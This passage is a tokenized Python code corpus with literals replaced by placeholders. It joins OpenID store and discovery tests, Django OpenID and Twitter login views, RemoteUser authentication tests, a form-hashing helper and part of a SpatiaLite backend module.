<EOL> def testStore ( store ) : <EOL> """<STR_LIT>""" <EOL> now = int ( time . time ( ) ) <EOL> server_url = '<STR_LIT>' <EOL> def genAssoc ( issued , lifetime = <NUM_LIT> ) : <EOL> sec = generateSecret ( <NUM_LIT:20> ) <EOL> hdl = generateHandle ( <NUM_LIT> ) <EOL> return Association ( hdl , sec , now + issued , lifetime , '<STR_LIT>' ) <EOL> def checkRetrieve ( url , handle = None , expected = None ) : <EOL> retrieved_assoc = store . getAssociation ( url , handle ) <EOL> assert retrieved_assoc == expected , ( retrieved_assoc , expected ) <EOL> if expected is not None : <EOL> if retrieved_assoc is expected : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert retrieved_assoc . handle == expected . handle <EOL> assert retrieved_assoc . secret == expected . secret <EOL> def checkRemove ( url , handle , expected ) : <EOL> present = store . removeAssociation ( url , handle ) <EOL> assert bool ( expected ) == bool ( present ) <EOL> assoc = genAssoc ( issued = <NUM_LIT:0> ) <EOL> checkRetrieve ( server_url ) <EOL> store . storeAssociation ( server_url , assoc ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> store . storeAssociation ( server_url , assoc ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> checkRemove ( server_url , assoc . handle + '<STR_LIT:x>' , False ) <EOL> checkRemove ( server_url + '<STR_LIT:x>' , assoc . handle , False ) <EOL> checkRemove ( server_url , assoc . handle , True ) <EOL> checkRemove ( server_url , assoc . handle , False ) <EOL> store . storeAssociation ( server_url , assoc ) <EOL> assoc2 = genAssoc ( issued = <NUM_LIT:1> ) <EOL> store . storeAssociation ( server_url , assoc2 ) <EOL> checkRetrieve ( server_url , None , assoc2 ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , assoc2 ) <EOL> assoc3 = genAssoc ( issued = <NUM_LIT:2> , lifetime = <NUM_LIT:100> ) <EOL> store . storeAssociation ( server_url , assoc3 ) <EOL> checkRetrieve ( server_url , None , assoc3 ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , assoc2 ) <EOL> checkRetrieve ( server_url , assoc3 . handle , assoc3 ) <EOL> checkRemove ( server_url , assoc2 . handle , True ) <EOL> checkRetrieve ( server_url , None , assoc3 ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , None ) <EOL> checkRetrieve ( server_url , assoc3 . handle , assoc3 ) <EOL> checkRemove ( server_url , assoc2 . handle , False ) <EOL> checkRemove ( server_url , assoc3 . handle , True ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , None ) <EOL> checkRetrieve ( server_url , assoc3 . handle , None ) <EOL> checkRemove ( server_url , assoc2 . handle , False ) <EOL> checkRemove ( server_url , assoc . handle , True ) <EOL> checkRemove ( server_url , assoc3 . handle , False ) <EOL> checkRetrieve ( server_url , None , None ) <EOL> checkRetrieve ( server_url , assoc . handle , None ) <EOL> checkRetrieve ( server_url , assoc2 . handle , None ) <EOL> checkRetrieve ( server_url , assoc3 . handle , None ) <EOL> checkRemove ( server_url , assoc2 . handle , False ) <EOL> checkRemove ( server_url , assoc . handle , False ) <EOL> checkRemove ( server_url , assoc3 . handle , False ) <EOL> assocValid1 = genAssoc ( issued = - <NUM_LIT> , lifetime = <NUM_LIT> ) <EOL> assocValid2 = genAssoc ( issued = - <NUM_LIT:5> ) <EOL> assocExpired1 = genAssoc ( issued = - <NUM_LIT> , lifetime = <NUM_LIT> ) <EOL> assocExpired2 = genAssoc ( issued = - <NUM_LIT> , lifetime = <NUM_LIT> ) <EOL> store . cleanupAssociations ( ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:1>' , assocValid1 ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:1>' , assocExpired1 ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:2>' , assocExpired2 ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:3>' , assocValid2 ) <EOL> cleaned = store . cleanupAssociations ( ) <EOL> assert cleaned == <NUM_LIT:2> , cleaned <EOL> def checkUseNonce ( nonce , expected , server_url , msg = '<STR_LIT>' ) : <EOL> stamp , salt = split ( nonce ) <EOL> actual = store . useNonce ( server_url , stamp , salt ) <EOL> assert bool ( actual ) == bool ( expected ) , "<STR_LIT>" % ( actual , expected , <EOL> msg ) <EOL> for url in [ server_url , '<STR_LIT>' ] : <EOL> nonce1 = mkNonce ( ) <EOL> checkUseNonce ( nonce1 , True , url ) <EOL> checkUseNonce ( nonce1 , False , url ) <EOL> checkUseNonce ( nonce1 , False , url ) <EOL> old_nonce = mkNonce ( <NUM_LIT> ) <EOL> checkUseNonce ( old_nonce , False , url , "<STR_LIT>" % ( old_nonce , ) ) <EOL> old_nonce1 = mkNonce ( now - <NUM_LIT> ) <EOL> old_nonce2 = mkNonce ( now - <NUM_LIT> ) <EOL> recent_nonce = mkNonce ( now - <NUM_LIT> ) <EOL> from openid . store import nonce as nonceModule <EOL> orig_skew = nonceModule . SKEW <EOL> try : <EOL> nonceModule . SKEW = <NUM_LIT:0> <EOL> store . cleanupNonces ( ) <EOL> nonceModule . SKEW = <NUM_LIT> <EOL> assert store . useNonce ( server_url , * split ( old_nonce1 ) ) <EOL> assert store . useNonce ( server_url , * split ( old_nonce2 ) ) <EOL> assert store . useNonce ( server_url , * split ( recent_nonce ) ) <EOL> nonceModule . SKEW = <NUM_LIT> <EOL> cleaned = store . cleanupNonces ( ) <EOL> assert cleaned == <NUM_LIT:2> , "<STR_LIT>" % ( cleaned , ) <EOL> nonceModule . SKEW = <NUM_LIT> <EOL> assert store . useNonce ( server_url , * split ( old_nonce1 ) ) <EOL> assert store . useNonce ( server_url , * split ( old_nonce2 ) ) <EOL> assert not store . useNonce ( server_url , * split ( recent_nonce ) ) <EOL> finally : <EOL> nonceModule . SKEW = orig_skew <EOL> def test_filestore ( ) : <EOL> from openid . store import filestore <EOL> import tempfile <EOL> import shutil <EOL> try : <EOL> temp_dir = tempfile . mkdtemp ( ) <EOL> except AttributeError : <EOL> import os <EOL> temp_dir = os . tmpnam ( ) <EOL> os . mkdir ( temp_dir ) <EOL> store = filestore . FileOpenIDStore ( temp_dir ) <EOL> try : <EOL> testStore ( store ) <EOL> store . cleanup ( ) <EOL> except : <EOL> raise <EOL> else : <EOL> shutil . rmtree ( temp_dir ) <EOL> def test_sqlite ( ) : <EOL> from openid . store import sqlstore <EOL> try : <EOL> from pysqlite2 import dbapi2 as sqlite <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> conn = sqlite . connect ( '<STR_LIT>' ) <EOL> store = sqlstore . SQLiteStore ( conn ) <EOL> store . createTables ( ) <EOL> testStore ( store ) <EOL> def test_mysql ( ) : <EOL> from openid . store import sqlstore <EOL> try : <EOL> import MySQLdb <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> db_user = '<STR_LIT>' <EOL> db_passwd = '<STR_LIT>' <EOL> db_name = getTmpDbName ( ) <EOL> from MySQLdb . constants import ER <EOL> conn = MySQLdb . connect ( user = db_user , passwd = db_passwd , host = db_host ) <EOL> conn . query ( '<STR_LIT>' % db_name ) <EOL> try : <EOL> conn . query ( '<STR_LIT>' % db_name ) <EOL> store = sqlstore . MySQLStore ( conn ) <EOL> store . createTables ( ) <EOL> testStore ( store ) <EOL> finally : <EOL> conn . query ( '<STR_LIT>' % db_name ) <EOL> def test_postgresql ( ) : <EOL> """<STR_LIT>""" <EOL> from openid . store import sqlstore <EOL> try : <EOL> import psycopg <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> db_name = getTmpDbName ( ) <EOL> db_user = '<STR_LIT>' <EOL> conn_create = psycopg . connect ( database = '<STR_LIT>' , user = db_user , <EOL> host = db_host ) <EOL> conn_create . autocommit ( ) <EOL> cursor = conn_create . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' % ( db_name , ) ) <EOL> conn_create . close ( ) <EOL> conn_test = psycopg . connect ( database = db_name , user = db_user , <EOL> host = db_host ) <EOL> store = sqlstore . PostgreSQLStore ( conn_test ) <EOL> store . createTables ( ) <EOL> testStore ( store ) <EOL> conn_test . close ( ) <EOL> import time <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> conn_remove = psycopg . connect ( database = '<STR_LIT>' , user = db_user , <EOL> host = db_host ) <EOL> conn_remove . autocommit ( ) <EOL> cursor = conn_remove . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' % ( db_name , ) ) <EOL> conn_remove . close ( ) <EOL> def test_memstore ( ) : <EOL> from openid . store import memstore <EOL> testStore ( memstore . MemoryStore ( ) ) <EOL> test_functions = [ <EOL> test_filestore , <EOL> test_sqlite , <EOL> test_mysql , <EOL> test_postgresql , <EOL> test_memstore , <EOL> ] <EOL> def pyUnitTests ( ) : <EOL> tests = map ( unittest . FunctionTestCase , test_functions ) <EOL> load = unittest . defaultTestLoader . loadTestsFromTestCase <EOL> return unittest . TestSuite ( tests ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> suite = pyUnitTests ( ) <EOL> runner = unittest . TextTestRunner ( ) <EOL> result = runner . run ( suite ) <EOL> if result . wasSuccessful ( ) : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import urlparse <EOL> import re <EOL> import types <EOL> from openid . yadis . discover import discover , DiscoveryFailure <EOL> from openid import fetchers <EOL> import discoverdata <EOL> status_header_re = re . compile ( r'<STR_LIT>' , re . MULTILINE ) <EOL> four04_pat = """<STR_LIT>""" <EOL> class QuitServer ( Exception ) : pass <EOL> def mkResponse ( data ) : <EOL> status_mo = status_header_re . match ( data ) <EOL> headers_str , body = data . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> headers = { } <EOL> for line in headers_str . split ( '<STR_LIT:\n>' ) : <EOL> k , v = line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> k = k . strip ( ) . lower ( ) <EOL> v = v . strip ( ) <EOL> headers [ k ] = v <EOL> status = int ( status_mo . group ( <NUM_LIT:1> ) ) <EOL> return fetchers . HTTPResponse ( status = status , <EOL> headers = headers , <EOL> body = body ) <EOL> class TestFetcher ( object ) : <EOL> def __init__ ( self , base_url ) : <EOL> self . base_url = base_url <EOL> def fetch ( self , url , headers , body ) : <EOL> current_url = url <EOL> while True : <EOL> parsed = urlparse . urlparse ( current_url ) <EOL> path = parsed [ <NUM_LIT:2> ] [ <NUM_LIT:1> : ] <EOL> try : <EOL> data = discoverdata . generateSample ( path , self . base_url ) <EOL> except KeyError : <EOL> return fetchers . HTTPResponse ( status = <NUM_LIT> , <EOL> final_url = current_url , <EOL> headers = { } , <EOL> body = '<STR_LIT>' ) <EOL> response = mkResponse ( data ) <EOL> if response . status in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> current_url = response . headers [ '<STR_LIT:location>' ] <EOL> else : <EOL> response . final_url = current_url <EOL> return response <EOL> class TestSecondGet ( unittest . TestCase ) : <EOL> class MockFetcher ( object ) : <EOL> def __init__ ( self ) : <EOL> self . count = <NUM_LIT:0> <EOL> def fetch ( self , uri , headers = None , body = None ) : <EOL> self . count += <NUM_LIT:1> <EOL> if self . count == <NUM_LIT:1> : <EOL> headers = { <EOL> '<STR_LIT>' . lower ( ) : '<STR_LIT>' , <EOL> } <EOL> return fetchers . HTTPResponse ( uri , <NUM_LIT:200> , headers , '<STR_LIT>' ) <EOL> else : <EOL> return fetchers . HTTPResponse ( uri , <NUM_LIT> ) <EOL> def setUp ( self ) : <EOL> self . oldfetcher = fetchers . getDefaultFetcher ( ) <EOL> fetchers . setDefaultFetcher ( self . MockFetcher ( ) ) <EOL> def tearDown ( self ) : <EOL> fetchers . setDefaultFetcher ( self . oldfetcher ) <EOL> def test_404 ( self ) : <EOL> uri = "<STR_LIT>" <EOL> self . failUnlessRaises ( DiscoveryFailure , discover , uri ) <EOL> class _TestCase ( unittest . TestCase ) : <EOL> base_url = '<STR_LIT>' <EOL> def __init__ ( self , input_name , id_name , result_name , success ) : <EOL> self . input_name = input_name <EOL> self . id_name = id_name <EOL> self . result_name = result_name <EOL> self . success = success <EOL> unittest . TestCase . __init__ ( self , methodName = '<STR_LIT>' ) <EOL> def setUp ( self ) : <EOL> fetchers . setDefaultFetcher ( TestFetcher ( self . base_url ) , <EOL> wrap_exceptions = False ) <EOL> self . input_url , self . expected = discoverdata . generateResult ( <EOL> self . base_url , <EOL> self . input_name , <EOL> self . id_name , <EOL> self . result_name , <EOL> self . success ) <EOL> def tearDown ( self ) : <EOL> fetchers . setDefaultFetcher ( None ) <EOL> def runCustomTest ( self ) : <EOL> if self . expected is DiscoveryFailure : <EOL> self . failUnlessRaises ( DiscoveryFailure , <EOL> discover , self . input_url ) <EOL> else : <EOL> result = discover ( self . input_url ) <EOL> self . failUnlessEqual ( self . input_url , result . request_uri ) <EOL> msg = '<STR_LIT>' % ( <EOL> result . normalized_uri , self . expected . normalized_uri ) <EOL> self . failUnlessEqual ( <EOL> self . expected . normalized_uri , result . normalized_uri , msg ) <EOL> msg = '<STR_LIT>' % ( <EOL> result . response_text , self . expected . response_text ) <EOL> self . failUnlessEqual ( <EOL> self . expected . response_text , result . response_text , msg ) <EOL> expected_keys = dir ( self . expected ) <EOL> expected_keys . sort ( ) <EOL> actual_keys = dir ( result ) <EOL> actual_keys . sort ( ) <EOL> self . failUnlessEqual ( actual_keys , expected_keys ) <EOL> for k in dir ( self . expected ) : <EOL> if k . startswith ( '<STR_LIT>' ) and k . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> exp_v = getattr ( self . expected , k ) <EOL> if isinstance ( exp_v , types . MethodType ) : <EOL> continue <EOL> act_v = getattr ( result , k ) <EOL> assert act_v == exp_v , ( k , exp_v , act_v ) <EOL> def shortDescription ( self ) : <EOL> try : <EOL> n = self . input_url <EOL> except AttributeError : <EOL> n = self . input_name <EOL> return "<STR_LIT>" % ( <EOL> n , <EOL> self . __class__ . __module__ ) <EOL> def pyUnitTests ( ) : <EOL> s = unittest . TestSuite ( ) <EOL> for success , input_name , id_name , result_name in discoverdata . testlist : <EOL> test = _TestCase ( input_name , id_name , result_name , success ) <EOL> s . addTest ( test ) <EOL> return s <EOL> def test ( ) : <EOL> runner = unittest . TextTestRunner ( ) <EOL> return runner . run ( loadTests ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> import logging <EOL> import openidgae <EOL> from django import http <EOL> from django import template <EOL> from django . template import loader <EOL> from django . conf import settings <EOL> from django . core import urlresolvers <EOL> from openid . consumer . consumer import Consumer <EOL> from openid . consumer import discover <EOL> from openidgae import store <EOL> from common import api <EOL> from common import memcache <EOL> from common import twitter <EOL> from common import user <EOL> from common import util <EOL> from poboxopenid import util as util_externals <EOL> import facebook . djangofb as facebook <EOL> def openid_google ( request ) : <EOL> openid = '<STR_LIT>' <EOL> return openid_login ( request , openid ) <EOL> def openid_login ( request , openid = '<STR_LIT>' ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> openid = openid . strip ( ) <EOL> if not openid : <EOL> message = '<STR_LIT>' <EOL> c = Consumer ( { } , store . DatastoreStore ( ) ) <EOL> try : <EOL> auth_request = c . begin ( openid ) <EOL> except discover . DiscoveryFailure , e : <EOL> logging . error ( '<STR_LIT>' <EOL> % ( openid , str ( e ) ) ) <EOL> message = '<STR_LIT>' <EOL> from openid . extensions import sreg <EOL> sreg_request = sreg . SRegRequest ( <EOL> optional = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> auth_request . addExtension ( sreg_request ) <EOL> from openid . extensions import ax <EOL> ax_req = ax . FetchRequest ( ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT:email>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> auth_request . addExtension ( ax_req ) <EOL> import urlparse <EOL> parts = list ( urlparse . urlparse ( util_externals . get_full_path ( request ) ) ) <EOL> parts [ <NUM_LIT:2> ] = urlresolvers . reverse ( '<STR_LIT>' ) [ <NUM_LIT:1> : ] <EOL> continueUrl = util_externals . get_continue_url ( request , '<STR_LIT>' ) <EOL> import urllib <EOL> parts [ <NUM_LIT:4> ] = '<STR_LIT>' % urllib . quote_plus ( continueUrl ) <EOL> parts [ <NUM_LIT:5> ] = '<STR_LIT>' <EOL> return_to = urlparse . urlunparse ( parts ) <EOL> realm = urlparse . urlunparse ( parts [ <NUM_LIT:0> : <NUM_LIT:2> ] + [ '<STR_LIT>' ] * <NUM_LIT:4> ) <EOL> response = http . HttpResponse ( ) <EOL> session = openidgae . get_session ( request , response ) <EOL> import pickle <EOL> session . openid_stuff = pickle . dumps ( c . session ) <EOL> session . put ( ) <EOL> redirect_url = auth_request . redirectURL ( realm , return_to ) <EOL> response . write ( <EOL> "<STR_LIT>" <EOL> % ( redirect_url , ) ) <EOL> return response <EOL> def openid_createuser ( request ) : <EOL> person = openidgae . get_current_person ( request , http . HttpResponse ( ) ) <EOL> email = person . get_email ( ) <EOL> res = util_externals . reponse_if_exists ( email ) <EOL> if res is not None : <EOL> return res <EOL> nick = util_externals . get_nick_from_email ( email ) <EOL> params = { <EOL> '<STR_LIT>' : nick , <EOL> '<STR_LIT:password>' : util . generate_password ( ) , <EOL> '<STR_LIT>' : person . get_field_value ( '<STR_LIT>' , '<STR_LIT:none>' ) , <EOL> '<STR_LIT>' : person . get_field_value ( '<STR_LIT>' , '<STR_LIT:none>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:email>' : email , <EOL> } <EOL> actor_ref = util_externals . user_create ( '<STR_LIT>' , params , util . display_nick ( email ) , email ) <EOL> response = util . RedirectFlash ( '<STR_LIT:/>' , '<STR_LIT>' % util . get_metadata ( '<STR_LIT>' ) ) <EOL> user . set_user_cookie ( response , actor_ref ) <EOL> return response <EOL> def twitter_user_create ( request ) : <EOL> twitter_user , token = util_externals . twitter_user ( ) <EOL> if not twitter_user : <EOL> c = template . RequestContext ( request , locals ( ) ) <EOL> t = loader . get_template ( '<STR_LIT>' ) <EOL> return http . HttpResponse ( t . render ( c ) ) <EOL> res = util_externals . reponse_if_exists ( twitter_user . id , '<STR_LIT>' ) <EOL> if res is not None : <EOL> return res <EOL> nick = util_externals . get_nick_from_email ( twitter_user . screen_name ) <EOL> params = { <EOL> '<STR_LIT>' : nick , <EOL> '<STR_LIT:password>' : util . generate_password ( ) , <EOL> '<STR_LIT>' : twitter_user . name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:email>' : None , <EOL> } <EOL> actor_ref = util_externals . user_create ( '<STR_LIT>' , <EOL> params , <EOL> twitter_user . screen_name , <EOL> str ( twitter_user . id ) , <EOL> '<STR_LIT>' % twitter_user . screen_name ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> actor_ref . extra [ '<STR_LIT>' ] = token <EOL> actor_ref . put ( ) <EOL> response = util . RedirectFlash ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> user . set_user_cookie ( response , actor_ref ) <EOL> return response </s>
<s> from django . conf . urls . defaults import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ) </s>
<s> from datetime import datetime <EOL> from django . conf import settings <EOL> from django . contrib . auth . backends import RemoteUserBackend <EOL> from django . contrib . auth . models import AnonymousUser , User <EOL> from django . test import TestCase <EOL> class RemoteUserTest ( TestCase ) : <EOL> urls = '<STR_LIT>' <EOL> middleware = '<STR_LIT>' <EOL> backend = '<STR_LIT>' <EOL> known_user = '<STR_LIT>' <EOL> known_user2 = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . curr_middleware = settings . MIDDLEWARE_CLASSES <EOL> self . curr_auth = settings . AUTHENTICATION_BACKENDS <EOL> settings . MIDDLEWARE_CLASSES += ( self . middleware , ) <EOL> settings . AUTHENTICATION_BACKENDS = ( self . backend , ) <EOL> def test_no_remote_user ( self ) : <EOL> """<STR_LIT>""" <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = None ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> def test_unknown_user ( self ) : <EOL> """<STR_LIT>""" <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users + <NUM_LIT:1> ) <EOL> User . objects . get ( username = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users + <NUM_LIT:1> ) <EOL> def test_known_user ( self ) : <EOL> """<STR_LIT>""" <EOL> User . objects . create ( username = '<STR_LIT>' ) <EOL> User . objects . create ( username = '<STR_LIT>' ) <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user2 ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> def test_last_login ( self ) : <EOL> """<STR_LIT>""" <EOL> user = User . objects . create ( username = '<STR_LIT>' ) <EOL> default_login = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> user . last_login = default_login <EOL> user . save ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user ) <EOL> self . assertNotEqual ( default_login , response . context [ '<STR_LIT:user>' ] . last_login ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> user . last_login = default_login <EOL> user . save ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user ) <EOL> self . assertEqual ( default_login , response . context [ '<STR_LIT:user>' ] . last_login ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MIDDLEWARE_CLASSES = self . curr_middleware <EOL> settings . AUTHENTICATION_BACKENDS = self . curr_auth <EOL> class RemoteUserNoCreateBackend ( RemoteUserBackend ) : <EOL> """<STR_LIT>""" <EOL> create_unknown_user = False <EOL> class RemoteUserNoCreateTest ( RemoteUserTest ) : <EOL> """<STR_LIT>""" <EOL> backend = '<STR_LIT>' <EOL> def test_unknown_user ( self ) : <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> class CustomRemoteUserBackend ( RemoteUserBackend ) : <EOL> """<STR_LIT>""" <EOL> def clean_username ( self , username ) : <EOL> """<STR_LIT>""" <EOL> return username . split ( '<STR_LIT:@>' ) [ <NUM_LIT:0> ] <EOL> def configure_user ( self , user ) : <EOL> """<STR_LIT>""" <EOL> user . email = '<STR_LIT>' <EOL> user . save ( ) <EOL> return user <EOL> class RemoteUserCustomTest ( RemoteUserTest ) : <EOL> """<STR_LIT>""" <EOL> backend = '<STR_LIT>' <EOL> known_user = '<STR_LIT>' <EOL> known_user2 = '<STR_LIT>' <EOL> def test_known_user ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RemoteUserCustomTest , self ) . test_known_user ( ) <EOL> self . assertEqual ( User . objects . get ( username = '<STR_LIT>' ) . email , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . get ( username = '<STR_LIT>' ) . email , '<STR_LIT>' ) <EOL> def test_unknown_user ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RemoteUserCustomTest , self ) . test_unknown_user ( ) <EOL> newuser = User . objects . get ( username = '<STR_LIT>' ) <EOL> self . assertEqual ( newuser . email , '<STR_LIT>' ) </s>
<s> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from django . conf import settings <EOL> from django . utils . hashcompat import md5_constructor <EOL> from django . forms import BooleanField <EOL> def security_hash ( request , form , * args ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> data . extend ( args ) <EOL> data . append ( settings . SECRET_KEY ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> return md5_constructor ( pickled ) . hexdigest ( ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from decimal import Decimal <EOL> from django . db import connection <EOL> from django . contrib . gis . measure import Distance <EOL> from django . contrib . gis . db . backend . util import SpatialOperation , SpatialFunction <EOL> qn = connection . ops . quote_name <EOL> GEOM_SELECT = '<STR_LIT>' <EOL> def get_func ( str ) : <EOL> return str <EOL> AREA = get_func ( '<STR_LIT>' ) <EOL> ASSVG = get_func ( '<STR_LIT>' ) <EOL> CENTROID = get_func ( '<STR_LIT>' ) <EOL> CONTAINED = get_func ( '<STR_LIT>' ) <EOL> DIFFERENCE = get_func ( '<STR_LIT>' ) <EOL> DISTANCE = get_func ( '<STR_LIT>' ) <EOL> ENVELOPE = get_func ( '<STR_LIT>' ) <EOL> GEOM_FROM_TEXT = get_func ( '<STR_LIT>' ) <EOL> GEOM_FROM_WKB = get_func ( '<STR_LIT>' ) <EOL> INTERSECTION = get_func ( '<STR_LIT>' ) <EOL> LENGTH = get_func ( '<STR_LIT>' ) <EOL> NUM_GEOM = get_func ( '<STR_LIT>' ) <EOL> NUM_POINTS = get_func ( '<STR_LIT>' ) <EOL> POINT_ON_SURFACE = get_func ( '<STR_LIT>' ) <EOL> SCALE = get_func ( '<STR_LIT>' ) <EOL> SYM_DIFFERENCE = get_func ( '<STR_LIT>' ) <EOL> TRANSFORM = get_func ( '<STR_LIT>' ) <EOL> TRANSLATE = get_func ( '<STR_LIT>' ) <EOL> UNION = '<STR_LIT>' <EOL> UNIONAGG = '<STR_LIT>' <EOL> class SpatiaLiteOperator ( SpatialOperation ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , operator ) : <EOL> super ( SpatiaLiteOperator , self ) . __init__ ( operator = operator , beg_subst = '<STR_LIT>' ) <EOL> class SpatiaLiteFunction ( SpatialFunction ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , function , ** kwargs ) : <EOL> super ( SpatiaLiteFunction , self ) . __init__ ( get_func ( function ) , ** kwargs ) <EOL> class SpatiaLiteFunctionParam ( SpatiaLiteFunction ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , func ) : <EOL> super ( SpatiaLiteFunctionParam , self ) . __init__ ( func , end_subst = '<STR_LIT>' ) <EOL> class SpatiaLiteDistance ( SpatiaLiteFunction ) : <EOL> "<STR_LIT>" <EOL> dist_func = '<STR_LIT>' <EOL> def __init__ ( self , operator ) : <EOL> super ( SpatiaLiteDistance , self ) . __init__ ( self . dist_func , end_subst = '<STR_LIT>' , <EOL> operator = operator , result = '<STR_LIT>' ) <EOL> class SpatiaLiteRelate ( SpatiaLiteFunctionParam ) : <EOL> "<STR_LIT>" <EOL> pattern_regex = re . compile ( r'<STR_LIT>' ) <EOL> def __init__ ( self , pattern ) : <EOL> if not self . pattern_regex . match ( pattern ) : <EOL> raise ValueError ( '<STR_LIT>' % pattern ) <EOL> super ( SpatiaLiteRelate , self ) . __init__ ( '<STR_LIT>' ) <EOL> SPATIALITE_GEOMETRY_FUNCTIONS = { <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : 